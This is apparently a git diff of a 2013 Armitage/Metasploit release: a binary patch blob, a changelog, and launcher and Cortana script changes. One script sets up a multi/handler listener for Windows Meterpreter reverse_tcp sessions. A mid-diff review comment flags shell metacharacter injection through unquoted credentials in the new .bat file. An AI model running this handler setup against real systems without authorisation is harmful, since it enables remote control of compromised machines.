z2!fR=D!jXV9GN^vdiU%zeR-+r8a^q>{lTWg=u|dcIpew9a>#SEe4d&<*M~?R_vjJ# zDgt(G{L7y7(`n}Pc^aG*@=|tI?#uEGzd-);Ut&9+9z2&<FE%gGz(NXoAse+bXd!<k z1;4=ZSF_4oP0L=$zS_cyF0UoKml&A$Ug#aAUYxHuyzmlY@IQE5xgm?2m6x*B>%2r& z*UhAP1%oBO)H_PHYH1RCDg$0-POGZ0RoN|^wZ;~6+*2Kw54D(<+{<#ohUpQEKIKu4 zmt^}&UtJPPHOplVgDyug@dPM@HaftBI#J>Qb4STak}sFPf@;ObN%I<s1OF3f&uG9Q z?`pblgopzC(<($Yz#0$xbu1QIyhi=%ms$M)O1f<BEa@w$VqNc9^kq2rI)+M+qJB^g z<M*fd9CK4Dc`X~*<_$ze-r-tCzR`P0Qr^AUV6gyJVh4Zp3MrNE8d<Gq^&9zk)Nv-o z{JycslD@r>=K#C6D0=YBSX7P*o}1&)=3Dv1LtDo;YctW58T=WdXzK6h%1Tbu!f+<x zBolhzrLx>Sqd-<aEV@<XV9c1~oPR!oaOah>jv2)l=<TJTiW@h=u>$&AAK_bBp~xIc zFVNSNF3vME+x>}s)&iW*Dl9Umk|Of}(iF<J^eTi_pUr6wzNtf@d<b_4D3kd#yHLI~ z90RRtuE7}}jfGa)xsXN~t*o?`u;TrKV{6`u=BGGFyzUhHPFD5%liY$PP<0tpRZdl% zDD|B@s&>6YJNG;-sKC?0i{8AGuRhJ4rd;WTSY3%&Rh}@3_mOyAXntS$>T~+}vf-w< zRz5&LDVM(AaWcv-(87)FwDMVX_J3%uHjXZ}&|8!~7Reui%0;R0T~9qeVKAuP%hwjS z_do|#;b^n>@(|6*dbDyoB4RgssGOs;)j8`zuu21AD-+;QlcV<_R&r8y*(WzvQ|<?x zsVb<&%ltmbO@@C!jdNifEeNwPBi-M6E2-MTKXL|brzlo!TOH0Y;%~Xy1y*f-J&t~d zFlm@rZvHfS12kO@O_lRdpGeL+I}$B4|0uVxXW#b3OxpDxEkxIs89vIg+^e3;*a}(f 
z1ea2lR|C#^9jsEXUw(u#LL-LyQqU*83y<GT4ep=9Aj*Psb&3F*Pw}7hbtR1t*8BD~ z21ZQ```M$bn=^TiWPeVy4`z3ACAuw<Iyk=^1`<vn8b6t--u*1(bJ}eNji7V~k<ZG5 z7p+d&C`YAojXs{DKI<z<S{|FYc&Qb%?1u}ca%tFsrhL{%nJl6+pY>k;OoRA(HL6TU zyQlCE(Q5o;rY;&`QD(rf-}L1DP40cv#;42oVfgri5hKX>$xLlZQD5|4QsW-_3JH!d zPe-i%lp2Q6#4oajt^Wx6kO~t`u3M%I<`3g1Gj%wf`XWDb@Zt-iJ#a0eeY1rtc^By& zq(SU`W8?A_aN<pvp^~vCTY;LalX(54IZWd15!W{V3V33`FDiKRGG)2Piu8UGZ_k6L z7QRN$CjN2>F0(=6bs_h!@`NjXMRWx0qZVKFl_Z~sKi~6Z6&kq%rIa0NbAZypB{lK4 z)_(G5T<Fxe&?z0`cL+z}Pgpq7oiFlOFJeu!I!i9!<U_k*-(Zft7cA&|F6M;8)kQuh zqyQGCUZfS@^m<8^m0{ES-i4R62q>j0COP!#o2>BC^NTxdheawwY2}K~?iPvPWt+US z3O$q$S!TbiqTb)Kpk{d%9@NdC$eQm^#O^U2`z{}UOUku79?J|5n<z)y&BqzV`pS~F zXB}3w8-_Ub!}O=T7wP_lniOLLNq9+bi*ZfeUW^o4-YZ757e2n{;D8dG?3i0*K^sf- zEmXgKv!Ek_I$)8fh?K9ICJLg{qV8h2(Ad)Ox7nftVilp9l|<7@d$pP@O~C!efg{aL z#4sVijT0+O#0El%O!W6w+fcI<<d?iH#Ih9Vqb{8@d{kbp@1wS&*(y;(7QPCGQ|^qR zjWDbNXS`QYttlnWTqTwl`g-!R+A6V@s<W4xcKYE_2}r{k2$4+6iq4d+5=CK9C?gsR z7i&;@IUIS9D=XF(+-q?ntE^Z{C>PF&fl*NB*(8=rbb`{s(F&dN>o6{7Y89>akZ$=n z*ZGDDuE`OMtC5h=oO8b|Csq??b*5A^(T(bviZz6@T{tn<RIDyocVk2)dSMDZdc|?# zZf~_U+ewg(*T)RKy^E)r%*5`3Uk_gUs~IZv=*fxfez0~|bM$;gFOFCy0NDXVb*HzQ zLKD@scrG2@@DvLAQly30Tjh}`75UR83sF>MC#%V1n%a?SPg2{Gn-#oLRV|iRZJj9L zS{kQ@xNcJ<%88Dt#V}Qe>2e)gOR=6RWTs3}x<P{f0(I#_Q4eOx98DLf9hgA5i)k4O zw&-~>TULhJj+&n`umxH{pHB1T!p>G=wCZbynp&?=`_P!#2ET1tqY&0>naqD_4a{n5 zjZT=Yl%ZH_v8Jl`TA5mDEjCa+-T;A5)$nr`+V=J|wC!O7FSOr61va89#oCBb!mBJs zcvAO0=!?Xd15$|D&EWQe+kVa)Z;NrU@KA<Ebf>Z>4Xk;#VD&l%w3ASLQYsvH4nEUs z(BM1`3eWyUJ5j2de^FMb_=?(zm20T69qe#ESH{QM!43g8W$K0<Jn{avM7dL+hZs29 zJPe&^V~>iP?#YE|_K3}|d33^FY@<5-SWR{>)H>D^4Rw60u%X>^snDHfI$*HfdIf{M zSNqXR2gJ?R*Ak_r7)O}4eW6^o+))fwsXoYB4f+a;{xGJM6ZB|WBo{_Fi4iL2Vl|~Y ziHSl_YijKx>S>3QXiY)RP%+1uBXga_7Qz8nBcUc27mR|`@(k%Ne62`5T;ZJaE@HR| z^5iZUabB)sq|i`g1#JbJYK+l^F1ccsdmGM)F7+*)=>fB9mxh+5Cn-lHPZ@VgLom#9 z!{AD&PixAHp;XYs(uKS#po(L81jVL?9M(0rbmVYAD}|)ICX8W-;MJTnHgp#wOuEqO z@?sU*?=IFAmf(;%6YSN=AfcHD1pm{H!*N{=@DT>bcjT}|1@tYeD<@VAwp3HyUX~iJ 
z!Qnm%4Tg6w#r3@c%(xw=VOW#nJwdo6aN;{7)(@0Ryu|v#?oo8oOB^ixH<p1SrMO@Q z9ODfw9!%lp+2#$l>S>%X^FeQlXLF*Pk62F_pU#QPzM?thth6jgAIZ{|a(rOVfCb7j zGxGI?XSyy{!qzm?7u?gf7~x1^$X?P^#5B7Ox3d+Y(!h!cgxtflsiN3am3`Eb{Qk5I zBF{>wclk8MR1zDjdOftHgHJ7eDHf;jsnK&wM=ZMdCo@&`*pfOux2(jEDV*@b^zY(_ zUcP!vRsF<vLT)~#`HBA%UO%BcKe4%L*i%a?Y=>Ki`>!prb?T4EpYcqF{(EC7@5f4V zcKajN{R`#7C;nnxRopw73Jbve)8apga;CHZF;aE2NTwbKV2(K=P;O<hJVjQ<mDar+ zC(<mfY$?tU@i)fGs&vR!F=Y&Gg|%kv+nKCw@Wk2J5=@MeCcOgDBPcGFEeeFi+BkFK zsE3s$6$HXsPs(#7*2l_<>IDHA?9GvsAhC|H)Rz<2g2bwVuRkZeg2f17MF1zvbyhfv z)dtFC1f#i)fgC;;jOHGPaiV3El>?>J1y8sZJWK0vcz_m{$E0XZ9M&SPmN(>tQwXk= z^BQsDYjf1b;TXABqgyF#5ZaX1gkb6LQTq0vzOh!;?6{W9t<#~w9?iI<cpY3?xs{R7 z&|Mu?3`g5?q;h8~8#-GNY6f;ywDG7NXK2yY%APZ1=plB0Hx8fEi`7l;&@Me@k46br z-t5w=p@t$@?k7?YQS2yq4PoD2bX!E1UytNOXef*-jAMi+O$kNG0sOETBZ6nZKON&C z<wGc>Buyu~Du~J}vv~2eDwrix=5yk96;#wN=7d-kh6`W8iS6s)Q>i~|szOThbsRpv z*-FhXpHh^3U}fbq$*vk&__CgN3GdBpA~ZP4i5;h{Jh}U<s)P5~84lO0E;bbo=5S(F zb&O8BZX}$@tDUtOZMlH4Cp8mT162cWm0}oNLkty6?i&$DO3Ak}l@|HDibaXS3#UGF z){qh_53bHw3+vLup{j~{gu@4`EUdAhnPv!q1vSy~Z3|ZBMkTJ+7L;2P(^k5@5pkrt zwOHgkbL2q<YiC+q3)&5FF(S3t947ZgTN@Iqxf#oxXk=}~(WI&zDX49&Db<b7;R-Ex zA&0;;0asZn9|lbdkPR>*Bg4d+LfN_;ITr@szKh^Qd?Rb=jsl?-j`sg<%HXcTs+R0K z_-A{Y)B(@Pw!93ccA@SJ8PS0w8|sKLLj5j`2>RLXRqBE<d=o2kqs`l`-I%q5gtYw} z`Fzycju}it|1!o8$2ja>53_=Jf)gvxSX-BJL8r3{6WE`ms3<JWlh0avQ{?|3>0LcY z>U4_3$Ie@uQsoFtKkfcBB5s^<T?81N&v1C+MQc|Me`Rp&Sq=wBiVX#?o1B<&4_5mz zC;kx$#+vt8Ss;CiM3nb>#E4|U>J|GAqh;^l{T~yEXMI#y`i_;=##^myOxg8BL%%b) z@Ee0eC^8yLmlTzaITih7h`LW;P#r8|v%t>MfmY{R;}E{e#*QX5)R=OWdqsm`gH0)h zP0_d>^tIzij*AVRF=4ieXaL5^4o294O5E_!t)#{#R_5tks_bP0F-rB;wG@)*1#U@F zazk(*akrtlK{h^g5Hpmjb|r}l;`4-mBQT5$u)$=22b#M#604dVrl>}kkwU83Skci& zxbD@hCKvArvr&_#F`!OiGISvlkTl~AYYa&vBV~MBW3ig5ToaipX^i=D7Cme%dS|q= zv84DWh%T4^(X1w72f?}%J!vAgRJrxEp+WtiW{0LIefAsW;hVCWVpKlv%ZNV0{r>Db zkOs$~BS%whD0H)JMe=Tji}`s5=_dbxqE+js{h-V#y%`uL%#)#~&7fbCg)&v4g{Y=x z&BZFJri)5LS<S^5Rm_qfP?+l7F_{|Q0=|1%$(HL79}Go)#E^4K7^6?%k3u!Yx5Vv~ 
z7%W34TH;P*SjZ0s3+m{H3wqO5s5m;cG+s2_)`nKMg4IXQm2fQ;EwXhh)tYZCDm5j! zFfmqarh2nNrUqx)Rw%`4-x{oU)=Gs{=x|3w+YkngeJ??HoTkXunGUsv2i}-dR3|+7 z{IxZP`D#l}6x(a;sAn7aWTBN2@u!?Ns8HF~h+usGi!-~@b)aTj44e&qyiB9jIMMjF z;678ABVq%M7u{pX=XxB$bMaO*u%SkZ;UFP6(#U8@s~d4xLz#^=r7s2DqBz%yE*e{U z_di@NA4HcznzsXTy-_KoWebf)9#ZWUl6u6J;=0`)?Oo~yGilqS8|~W}%WzZ8V8?hx z<x8E647SuL9=b@&xQ=}kTz1_{ai#SEm*k1o9ni#)p}fq03@nAigBse%VAD|?9z0&- z!_~Iv2>9PI9F9%Vc=M(b7(5gCPv$#t+tId;$cJcB8B&QXJHZf1c!NhLEK>fO%D(;R zL?>`OTF5!PI^(Y6^m6La86z%b6$c0I!uG-4I7Fyr7s&sx#R$8w*woNa1|P}daP>Wg zE_FGn=(yuyD(otHkVRLlS`v?OqH9;EbRQ3&bQLR5>=_tbvc~nUkf=M&;8<Y|9!Fut z@!g>5>kGVM+!gMeAffdojyT0(Nqzn@C&I65Txez-BI`j8M`CXp98&Y4La&0`Mg|Kq z3^)xneXQUT?s2Z)yNfM_>-RbFp*ybFuU>Pa+j~RD`^95ay)M*XZDNOs^)s9)EfUW# zeB4JFFNtT9NRdPZP=721g{CTs>LFI9(><^(z#WaI7yQ`F-p-mld!j4t?KpD6#V&|` zXUGKXKr$X6j#M7(igNL%5uE2Z`k{b^<|B>9qKIq`%MLlZa=(Hlf(;=~e0OkE=p z8Jq0P>1%I@ceun$=UfFM<<5HaLGmK;6N5Xd#)sHbZhJdFGWiYD=aZ`T6x!O}pSu2r z<iMR6i4y6=Z<xJmj+Qy?`-1b!44Fy-C0yM{tNTJ)qkI|l?k84PeJ<y~Wse6X><ggK z0SLhJ{b2B()j4q~+yQ6z`$Ny2wK(D);b2R*o*1smsr?Z}%j)nl(`W}g(zU>_s=La{ zUc~USatW|^_12tN-NC_{%=Z|C3`qdvR2&dy?H6=)KrYV2Amk(~3+%+p7It^QoAAz{ zOp^#B^^W6kc5l2$qgx`h{20%XRf$*zUhBn)hy<v7-gp=1kOYb53B0Uf5^k8^ByytD zPzP7qnFKlU!#Q$ctb+r4YEfRNIt@V8QKMK{D`9d5%^QexNx^alU-HypkX~fPWtK^B z#z5R~zSzqC_NBOi2%8F7jOZkU?&S4W?t@xC*1)3=IF!!xh5q5NpofhEEj{31PmB9P zgTaH)<?s7w-XO7;YU&|}1?e^}WIb5qd-~dWkE%N&|9uhvl-d5YBMy{z$^o<0U^$CF zaj=LND;%ZegT;zcUi@-Qw>IOkjq*GGDL3f8Ho;4Cu(JGbu*hFvVL1eKcg1qF&JdBm zA0h4Y_)C8x^F9dadu4+E$T7ys-|Mu5)!loN_6-sFu5`HDn{7>t@xlf(lQKBSV*KEw z*e&`nMD&q%$J~aZTEl;+#!!*Jk*6C2rd6l0LuHPY3^-PU4i6RiJ1!<<Zna&gH!btL zy6I2b5_M~m$uN=cqpT6t%`1fnW$M=vezIA)zSMA-$lp$tFbu-GETrkfME+`{%?xnK zr8C3i=3g*iz&J7+F8WGaFHdL8)GS4B^l*l9GooQ|MOq$O(OvuVp~OvnyAFGSD(t|D zawp40OX<T!{(hh0;b^H^2)U1tfv6FpyDF<zC5nx#<ot_JUCeK8so3oshAkka&_rii z0~wO{_aztJSt6K}S!`+YlNr2xDSw1)28)qs=|v@fnyvLO{o)?J9UO~NA>}m<7%AKK zZdQ)i3Y(2<(5`Z0C^v(48MqQxG|Rp9s7#sOZ-0)P|E*wL4rD$`<gb`;y?e$a4SP3< 
z=#O%nyJrf8jS_<-%hw4zR>vGiRqDg+%F`YG(*miG0zGKWD3QNR>+mS_Xy{xC_M*?D zM1Gp<-wWN-;xG!Pw)=T7^jj?PVjp6(Xe*gcxcWIS7bj`d!DW65;F8@mV6^BXam{d< z>v96y?UAj1-gd$x-rGlu{9RwUqhZ3rJM_i?*o^`3^%d#H$TmGS==r>3*lM*!2bE)7 z^`3@~5q-O|P1Yovka!ntEpEl0F;p{tGE@Ki6li?c58m*l8<zBQ6!wj@f9?z;S3qh{ zx#?O1hiS)%o>G4f`mTRB5yQM=?9bb{W35OxR^;yiYB?6_`&XjGu_AvLSsDWl2GB-u z#4$}B@?-z~1MYn6^K)xAbU{W<2lN>@V%Yzq>!yz}yLUoK7yZu>wl9o)ljXUhX)+pJ z+Khfn7QH3q=Ztr0xewj@fWtV-Ip;uo+K?;{>GQ1Gs^0W8SswHj;{Z@1`HzzYw_w1` zWJ(w(`)@V_HmA^*aq@`CX28JN^lF?u(8fBvetQPi4S?3l?Z;>7q#rLU7?|Mm*aDhu z3Hy1Q{yx#5@v=VY<00I6D{UVy2ibdf?|<2LZ^yu&jp?+5-i{YNdoz=J^eDO*hmaVA zf68GQe&mPAhm9N<(reIw0sV*Th7TD0bC4{*ysu><B5Ny-BPqLa=?H~Pkj)W00SflJ zKm#Voll`KcLnbAd4Z^VvkMJ~pGE-BsY1;&`g5;h7XXi}mkIRq^;!8PYZF@q`C*WSZ z$?G5*q7HVU1{1LeD)UCB=1#=E&C5cWdOA@ISGE2qQ?pBgY}xi_km}MG1A7WqK&`&X z)cq8(hU!wWM7fea73-nqCe&jA)_uvTxR586<;2BQtYUCXNGd5m2}BtiPSkb@#^&i- zcFW=xT>8$b*p@TYbPKkjoJm+*9Jk}h=kmc=bxsCy!jU80CnL#Qf~*;9c>83C&qh*= z5v!&k{jaGQY)a}WsPNjo6s+?Lwxl=)CwUs-aG{&Gk-)*sz+iK}>FPZLxATjG6*^Ax z<*f6jie}VwDi$l1{ESGLFfqVLn9*@D*o@vzMQeCUSkg_LhMR_{5Kg2_Ll+WoE{JKJ z&4>x1oba3uwnf!AF^~~iIOoIIj!nlJ)uuHk%x0k59&wz=8wRzz&A|QeeHn@WU9_b= zjAuqX=aG<{{;)3I#}Xv`)zb(!68iKu61J2z0QSDcc)s^BinpeKG-Qp7`Wg{iN=d^V z)5ZiN;>_P2AzAL}2!-WxlZ;%}q@M}3W)3Qaq|HRnQiqg6@@7JI*054YtywTd7o@P6 zDbQhSS~Lssw|X>3Ql_J4Z)ZWr*~z7l#<Q_ZZ#=<>xKY+@^eigHh-j#IHfoifY(#LP zU=~6}dJ%@ynIUtqU`?CK8KkCj=D^@T7|hdyHPm&cs21K$FU3`EF1q#XcaF>>sH|In z|Mi;-4T@)$g7?jZmL2985qI*O2cCWNjEFTQ%|rjkFW`ve@MFu7$H7x)*xY8pdUKV+ z<R>$XtY+k%j$kdfh9O>*l#W2TAQQ*Zv3qtKDSB2?VLk$}BQmgzShg$Jk<#WvkCH7M zxjr8TkILdi@B(;f@lHmx6?*KJITnaD@KVV51)?`;7lOO}NnWtzJlr#HA%t!Ciz9ay zqW<sa$Ziqx|MxF)aQY&+q9j}9SOjhIu5hAS27;#Bbxy3l5C43g#j+9^aE<OJhaY7i zXW)8^5uT(jWY2*!!*nFv>;`=ZrdGwlm84UP9N*0FO=Yw+*h=e6cL`HrGnGVDqI!!l z3vMl^r5qb=0M)~(QC??;t+w>-$52y=!<!x~M(t7NKPWS5umqFkM0IKCf`itIb}oVF z&sJLUcGdb&@e)-0Y9mp4N?eMvYj$$k!KJuGMI9>e(E3S7Ww{bA6}6?OPLuK!u}o|( zti`KpS0Jsic^UlM-GdXW{Ir&&oomp)$X`)4zXIoKwj92y=);MX%Q2Prsl<to%VGEU 
zKu)Z#qE(lg9{a3-@jnH#vi}LMbeu<93k?>pfTtgXG6b<4t~D*CeV3Imd*fPKN{Z5Y zQj95XQzbWT04_`jqrt1thx;orbn1n3LbnQj-Cvgx&4uwzNV6K@d7?EQppqO@unKp4 zkxd!gNvPVK7pJYpa9Q7y6Zxxg6-$c69YQC(e<ETHlw041j;%qI&Rhdy4QR`V4uYl~ z`}U$5YcX6Nb)|l5aRd8j935PX%<$cwS~5w}`tr+HoptENtUh>laiG?lL&>8QvC(Is zmeNMSanj}P4&(oGh!$6V^x7<0>&Ww=QrE*WQD{CwDy+o$X95z$WGc?Y7Rs?q4APug zjA*V}Iva2E$v~rc0b!8pC22{sM(ak6*>E_$9)kL>)>2fKwmcQB7wfA$G9{`i<!k`M zqzz!`uu*0>xB&}=4O=D3jjT2xub|xshEKb-<Z%>T9dr(Lk{OhEP)qYp!Fue}FL&4l zhL63drB&C#s@?>v{&|gRY!ah|f*aIhGv?`en=r9yZyO0ydb|nt{(O%iZlvD~JI{H@ z2-rEFgBLc#bGc8c^%kh(u>})?>q|z&2&RQpxCH@qU<+b0<v&Km3Z@^p^oU}NEljN% z8om{#yYY#`wk9DKw0$dd^ZCk=w_7psBo=cbY#Rc9go=i2L+p6tJ;mD)eDO9Rru1eT z>TI)S2#&*KA=lQ~!ARf;cotND<z_@o>2(%V4D~9746cl}yKNVPOm0$c7TY1*4s+!C zahA(^lz!L_b1d>VA}(Zm750tafslR|V1)6uh#hDTo|4qb-vK#&bevdOGX&3Q?u53c zRX7q64kV2suGKhlVJFNusRl*uMrRI3gxIlS4IPRKDLs*7*5VBJqCy;K+kP;l?Sd&y z>u@-tVTcW{cZ<Olktp8{C&o7p(U9jKXf3WjN0v3imV#7&SxZF&QyX%I{eQs4hnsN1 zayR_Z2d7nc!^TgWQTlFdtH-orv@?C(E!HyWM}>dj@0`8Z?%LiNvghuFZZEqiWM6MX zKKn!;%IX}VrlWfhAye9O<nQiyN2=FJRH?HUdZ%{g@R+@rRp!NU;_hBV?VTQsXf2HF z&l-249YfKUWT;L1Q1N>Lhi~meGHm|<P85s`@h4X{OnU4GPuD?4*pW8uhtKv8myz+X zdhvdk>Fr1gI)IDj)=@O^fY^*Z+;Z^%&Xcqs7edKXLjrlWOPUy3AB4=06KTz1+~cPl zM7!B3oX9zd9P^%3PP|NmXRxf(P=iCLuy_)Ovu6UvdR{~64DL3W!zT{mx*9Zv6V`{} ziuXSV3+jCs%{-XOikk^G)9KA&oNB3)j)m*e5FgSq)Av7uk^gK<2wCq5@gfUz!xX+3 zxDcL2xkoTjzt~M)N8!>N$7s+|v7yNU8h8|5yl@n;8*rXsc<=gESlHu`VMeKW4E3ku z$EH}>i5n>UG22W>nJWBB2*uwCait^2F!$BC8A4t1LMqV9HBjop!;sRK=Dq)f(CvpI zzTESDjzjXZdz5+{r{ogz*ta9yIgZFncuaODFmkIEQnwRuez^~{6SQjd=MegS0`u+d zBD}lQLgz%2vazCwT_u*I(I-VW)wnV`hI_NuiXicM5+n9c6UsY@x+esw$cc(9b!v97 zFi7=4rK8Y_kTTasXGKd-;XqEiaz7wnvOEp09i~4ZOPYBQ_8NE^{XXO*;T7ncrw;GU zW2^-(GNk?!v%FP#iK<9{4>CC8R;aGDJx*7aMce)*n$n>^aXzRx=m%6o)upyfb^8k; zajz~d{tI3C6sseT&gkWj)vnVS*m6H!pM3@avZxbHID-JG)<s91dh0y+6#SmCSj3U$ zEKVrC@6NtmDdjBoKKJ$1(Vax_WuL`R7~hA!o<;5OemaUDq6=ad9PFbc(6V#5BK$Rg zUY&z$1`VcKe~V32vqtM^SE|m7kI99T75$qqRw{I$cT43%>1iz%r%b{9^G5vhGTukC 
zL+Kxrb>u!3onkM>k`iK-biESn@l?qJ+*9MMx$%>kx__LG?oLIcC59&>)6e6Uy<947 zKMyw`TR?XhVDmeDJ})Odye<G3HJb)s#QZpIl>E>}5<_Rt<>=ZAB7c<QAVYhmbM!4x z>HfZPE4S1U$Z-xwwpgiq@B+?S=c3H2TGM@aE#w($;HgCAgNgSRGS*;8$CVe+Ozb*3 zd{L|{_1OGw>koC%;~?asmC4tT4LWMIL+4Ijmqh*^*&7>{d0#|EtqrWB<Xy9cnq875 zx}Qv1mJEIGL#mQ%{dOIl-w%m9AW>>vuUmKM8v0iNekE_mT{;?nNcU^%*DI$?hhE5t ze1<)g59RdUO%*ST{GspWmyxafeo99zE+WX-xd^GfnjcMG_C<S*(VjAOfALQQ_+=K5 zm*w6r>RhXJC~}9rkzG<gdzy5HzFrms0$GZv#kDiu70}Z#*iZSG$hB;p;rH38;4i(i z<j}Rz*Y9<O2}dB=t7P}SMyc6y@<(0f`Pu<cF%5#1Tw8C_2?N)E+YWd?fUFd_L&??n zHkBB-tQNd>+5@gHzi_p?PxW%-7C$A_*--;6vV^HpR;@=g-oW+q&(9miM`r4Zd^(aN zr!w#6AjUesq%S#g+TAM`K)`FNlPjn8E>x-P!k!bEhZdD-t1oY8qJisC^-$A|;M(yE z*WU$n%D`1)`LrbV?0hb4rIfYq9hJKxR+JuY;y)f7dPQ^+dVioMSLDQH(iMbBoi92{ z!yi(FyqSBd);To#5+apZ<H<!jI%BB#f>j*<O-JTeMIWi6^y8(dG#h#-^L$|?I*Pd} zXCjlX!WJ*_QqpT!2(G>=@+YZkBtJB}j8@%Yer3A;or<%*04p288P`z1s2m5YUE?6d zFjT<%U6|AfK&4<?k@2B$K2-V&m6TFF)r>WW=MYQ(Y^A}Y_|8myVa2$dtMXs5{5i3C z=jo2G>^bgqj1lEr8K=>cU3t93*f{RYFFkuU1AWUz*eiKQI!U~)wCTFYA0krxlAl7K zFgJ<Uh1MOBUygkDFP}L(!1E6O0u;OtJjm|`Zui*4-0cRebF~7Ey&>nCS23WGHyycw zoG9ZcU;q{g);C4|e&{dP-<zgDU<Upv^WJ|1QLCFG->O*u&+Vww;LyQ!)$wikWTy7Q zdoFK^(UO6W_35|vG!ohEkVjW`ehhA=ZsNS{>=kl<8pcFd9|vL4u$6K?99@MX{t+un z+9v!1ZMD^CIsmDKc<tjM?A0Y6sHU6~3#(D~Kk_!;oIuMlYY-0h&_&6GM+lv6iTuR} r#vf6`Q$Na__lw$iLwmH|#W}WFIry<mnQLXQm2EoDq)h(^J*fW!6m5(L diff --git a/data/armitage/whatsnew.txt b/data/armitage/whatsnew.txt index 5ea39884dd68..c1e03e579b70 100755 --- a/data/armitage/whatsnew.txt +++ b/data/armitage/whatsnew.txt 
@@ -1,6 +1,32 @@ Armitage Changelog ================== +23 Jan 13 (tested against msf 16351) +--------- +- Added helpers to set EXE::Custom and EXE::Template options. +- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts +- Cleaned up Armitage -> SOCKS Proxy job management code. The code to + check if a proxy server is up was deadlock prone. Removed it. +- Starting SOCKS Proxy module now opens a tab displaying the module + start process. An event is posted to the event log too. +- Created an option helper to select credentials for SMBUser, SMBPass, + USERNAME, and PASSWORD. +- Added a feature to label hosts. A label will show up in its own column + in table view or below all info in graph view. Any team member may + change a label through [host] -> host -> Set Label. You may also use + dynamic workspaces to show hosts with certain labels attached. +- Fixed bad things happening when connecting Armitage to 'localhost' and + not '127.0.0.1'. +- Screenshots and Webcam shots are now centered in their tab. +- Added an alternate .bat file to start msfrpcd on Windows in the + Metasploit 4.5 installer's environment. +- Added a color-style for [!] warning messages + +Cortana Updates (for scripters) +-------- +- &handler function now works as advertised. +- Cortana now avoids use of core.setg + 4 Jan 13 (tested against msf 16252) -------- - Added a helper to set REXE option diff --git a/external/source/armitage/build.xml b/external/source/armitage/build.xml index b9d4ca043e54..f5bac934dc80 100644 --- a/external/source/armitage/build.xml +++ b/external/source/armitage/build.xml @@ -16,6 +16,8 @@ depend="yes" debug="true" optimize="yes" + target="1.6" + source="1.6" includeantruntime="fuckno" > <classpath path="./lib/jgraphx.jar;./lib/sleep.jar;./lib/msgpack-0.5.1-devel.jar;./lib/postgresql-9.1-901.jdbc4.jar" /> diff --git a/external/source/armitage/resources/about.html b/external/source/armitage/resources/about.html index 85c4fe5dbb98..e19056effad4 100644 
--- a/external/source/armitage/resources/about.html +++ b/external/source/armitage/resources/about.html @@ -3,7 +3,7 @@ <center><h1>Armitage 1.45</h1></center> <p>An attack management tool for Metasploit® - <br />Release: 4 Jan 13</p> + <br />Release: 23 Jan 13</p> <br /> <p>Developed by:</p> diff --git a/external/source/armitage/resources/msfconsole.style b/external/source/armitage/resources/msfconsole.style index a8aa51662121..3d927f37a9c3 100644 --- a/external/source/armitage/resources/msfconsole.style +++ b/external/source/armitage/resources/msfconsole.style @@ -4,6 +4,7 @@ ^msf (.*?)\((.*?)\) > \umsf\u $1(\c4$2\o) > ^\[\*\] (.*) \cC[*]\o $1 ^\[\+\] (.*) \c9[+]\o $1 +^\[\!\] (.*) \c8[!]\o $1 ^\[\-\] (.*) \c4[-]\o $1 ^ =\[ (.*) =[\c7 $1 ^(=[=\s]+) \cE$1 diff --git a/external/source/armitage/resources/msfrpcd_new.bat b/external/source/armitage/resources/msfrpcd_new.bat new file mode 100644 index 000000000000..b1bcb31a212e --- /dev/null +++ b/external/source/armitage/resources/msfrpcd_new.bat @@ -0,0 +1,12 @@ +@echo off +set BASE=$$BASE$$..\..\ +cd "%BASE%" +set PATH=%BASE%ruby\bin;%BASE%java\bin;%BASE%tools;%BASE%nmap;%BASE%postgresql\bin;%PATH% +IF NOT EXIST "%BASE%java" GOTO NO_JAVA +set JAVA_HOME="%BASE%java" +:NO_JAVA +set MSF_DATABASE_CONFIG="%BASE%apps\pro\ui\config\database.yml" +set MSF_BUNDLE_GEMS=0 +set BUNDLE_GEMFILE=%BASE%apps\pro\ui\Gemfile +cd "%BASE%apps\pro\msf3" +rubyw msfrpcd -a 127.0.0.1 -U $$USER$$ -P $$PASS$$ -S -f -p $$PORT$$ diff --git a/external/source/armitage/scripts-cortana/cortanadb.sl b/external/source/armitage/scripts-cortana/cortanadb.sl index 97eae7e56bad..8b1842f5fc54 100644 --- a/external/source/armitage/scripts-cortana/cortanadb.sl +++ b/external/source/armitage/scripts-cortana/cortanadb.sl 
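Review bot: The last line of msfrpcd_new.bat substitutes `$$USER$$` and `$$PASS$$` unquoted into a cmd.exe command line, so a password containing `&`, `|`, `^` or `%` would be reinterpreted by the shell instead of reaching msfrpcd intact. Quote both values, `rubyw msfrpcd -a 127.0.0.1 -U "$$USER$$" -P "$$PASS$$" -S -f -p $$PORT$$`, and have whatever fills the template reject `"` and `%`. The password is also visible in the process command line and presumably in the generated .bat on disk, and `-S` turns SSL off on the RPC socket; the `-a 127.0.0.1` bind limits that exposure to local users, which deserves a `rem` line saying it is deliberate. Separately, `set JAVA_HOME="%BASE%java"` stores the quote characters in the variable; `set "JAVA_HOME=%BASE%java"` avoids that.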
@@ -42,8 +42,13 @@ sub c_client { sub setupHandlers { find_job("Exploit: multi/handler", { if ($1 == -1) { + # set LPORT for the user... + local('$c'); + $c = call($client, "console.allocate")['id']; + call($client, "console.write", $c, "setg LPORT " . randomPort() . "\n"); + call($client, "console.release", $c); + # setup a handler for meterpreter - call($client, "core.setg", "LPORT", randomPort()); call($client, "module.execute", "exploit", "multi/handler", %( PAYLOAD => "windows/meterpreter/reverse_tcp", LHOST => "0.0.0.0", @@ -55,7 +60,7 @@ sub setupHandlers { sub main { global('$client $mclient'); - local('%r $exception'); + local('%r $exception $lhost $temp $c'); setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L); @@ -81,8 +86,24 @@ sub main { # setup second thread. %r = call($client, "armitage.validate", $user, $pass, $null, "armitage", 120326); + # resolve lhost.. + $c = call($client, "console.allocate")['id']; + call($client, "console.write", $c, "setg LHOST\n"); + while ($lhost eq "") { + $temp = call($client, "console.read", $c)['data']; + if (["$temp" startsWith: "LHOST => "]) { + $lhost = substr(["$temp" trim], 9); + } + else { + # this shouldn't happen because having LHOST set is a precondition + # for Cortana to connect to a team server. + sleep(1000); + } + } + call($client, "console.release", $c); + # pass some objects back yo. - [$loader passObjects: $client, $mclient]; + [$loader passObjects: $client, $mclient, $lhost]; # don't make previous messages available... call($mclient, "armitage.skip"); diff --git a/external/source/armitage/scripts-cortana/internal.sl b/external/source/armitage/scripts-cortana/internal.sl index d434f920da5a..c83929a79c1c 100644 --- a/external/source/armitage/scripts-cortana/internal.sl +++ b/external/source/armitage/scripts-cortana/internal.sl @@ -9,7 +9,7 @@ import msf.*; # setg("varname", "value") sub setg { - call_async("core.setg", $1, $2); + cmd_safe("setg $1 